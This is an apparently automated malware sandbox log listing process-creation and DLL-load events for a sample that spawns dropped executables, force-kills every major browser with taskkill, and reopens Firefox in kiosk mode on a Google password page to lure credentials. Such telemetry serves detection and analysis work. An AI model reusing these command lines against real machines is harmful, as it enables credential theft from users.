                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe "C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe "C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe "C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe "C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe "C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"Jump to behavior
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe "C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe "C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeProcess created: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe"
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeSection loaded: dpapi.dllJump to behavior
